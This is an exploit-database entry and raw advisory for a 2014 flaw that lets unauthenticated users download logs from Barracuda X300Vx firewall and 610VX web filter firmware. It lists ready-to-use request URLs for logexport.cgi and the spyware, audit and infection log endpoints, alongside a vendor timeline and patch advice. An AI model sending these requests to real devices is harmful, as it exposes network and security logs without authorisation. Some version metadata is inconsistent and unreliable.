multiple Barracuda products logfile disclosure

vendor:

multiple Barracuda products

by:

Juergen Grieshofer / 4CKnowLedge

8,8

CVSS

HIGH

Logfile Disclosure

200

CWE

Product Name: multiple Barracuda products

Affected Version From: v6.1.4.008 (2014-02-18 08:06:34)

Affected Version To: v7.0.1.006 (2013-12-12 14:51:33)

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

multiple Barracuda products logfile disclosure

An unauthenticated user can download logfiles from multiple Barracuda products without authentication. This vulnerability affects Barracuda products with firmware v6.1.4.008 (2014-02-18 08:06:34) and v7.0.1.006 (2013-12-12 14:51:33). The affected products are X300Vx and 610VX respectively. The exploit can be performed by accessing the URLs https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi and https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi, https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi and https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi.

Mitigation:

Update firmware to latest release

Source

Exploit-DB raw data:

# Exploit Title: multiple Barracuda products logfile disclosure
# Date: 03/26/2014
# Exploit Author: Juergen Grieshofer / 4CKnowLedge
# Author Homepage: https://4ck.eu/
# Vendor Homepage: https://barracudalabs.com

# Software Link: https://firewall.ptest.cudasvc.com/
# Firmware v6.1.4.008 (2014-02-18 08:06:34)
# Modell: X300Vx
# BNSEC Nr: BNSEC-4189

-- Download logs without authentication --
$Logfiles
https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]}
For further logfiles replace the values of [fw, access, http, network, vpn, svc]

Timeline:
        Vendor contacted: 03/26/2014
               Vendor generic ticket response: 03/28/2014
                       Vendor response: 05/16/2014
                               Vendor approved fix: 08/02/2014

Advice: Update firmware to latest release


# Software Link: https://webfilter.ptest.cudasvc.com/
# Firmware v7.0.1.006 (2013-12-12 14:51:33)
# Modell: 610VX
# BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232

-- Download logs without authentication --
$Weblog
https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total=

$Auditlog
https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total=

$Infectionlog
https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total=

Timeline:
        Vendor contacted: 04/01/2014
               Vendor response: 05/16/2014
                       Vendor approved fix: 08/02/2014

Advice: Update firmware to latest release